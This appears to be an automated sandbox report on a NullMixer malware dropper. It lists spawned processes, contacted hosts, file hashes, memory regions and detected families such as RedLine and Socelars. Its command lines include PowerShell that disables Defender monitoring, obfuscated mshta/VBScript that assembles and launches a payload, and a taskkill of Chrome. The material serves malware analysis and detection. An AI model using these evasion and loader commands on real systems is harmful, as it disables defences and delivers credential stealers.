C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$801E6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe"

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 276

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$301D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 468

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.134.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:49296 tcp
N/A 127.0.0.1:49298 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.20.4.235:443 pastebin.com tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2844-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2844-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2844-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/1232-150-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2816-144-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1936-153-0x00000000001B0000-0x00000000001B8000-memory.dmp

memory/2092-152-0x0000000000D00000-0x0000000000D18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G1DNHR7U492AU516ATI.temp

MD5 18d2e86178612aae3237795a235d2363
SHA1 efdd3baee5e982c359af8b77460351a6027586c0
SHA256 f366aa0b4f5fc79aa6ba1fb7774eaa536f81a6a719228a9c490f3c74eefbc920
SHA512 2cf5b8d966a7d46927bf2c4b6bedf058ebc45ada92317e13885f9965a6c0728d3c1f78e646c555b3ca9296ff814c13127c92aac2490aa9efa9e8cc7f63057b01

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1808-155-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-44TK9.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-44TK9.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1808-114-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

memory/2844-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2844-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2092-166-0x00000000001C0000-0x00000000001C6000-memory.dmp

memory/1724-173-0x0000000000E60000-0x0000000000EC8000-memory.dmp

memory/1868-182-0x0000000000400000-0x0000000000883000-memory.dmp

memory/1392-186-0x00000000023A0000-0x0000000002548000-memory.dmp

memory/2844-203-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2844-204-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-202-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-201-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2844-200-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2844-199-0x0000000000400000-0x000000000051C000-memory.dmp

memory/924-205-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2844-214-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2844-213-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2844-212-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2844-210-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2844-207-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2844-206-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2816-218-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1524-219-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1836-220-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-222-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-232-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-230-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-229-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-228-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1836-226-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-224-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1392-233-0x0000000002760000-0x0000000002805000-memory.dmp

memory/1392-237-0x0000000002810000-0x00000000028A2000-memory.dmp

memory/1392-234-0x0000000002810000-0x00000000028A2000-memory.dmp

memory/1392-239-0x00000000023A0000-0x0000000002548000-memory.dmp

memory/1392-238-0x0000000002810000-0x00000000028A2000-memory.dmp

memory/924-240-0x0000000000400000-0x000000000089C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win10v2004-20241007-en

Max time kernel

79s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
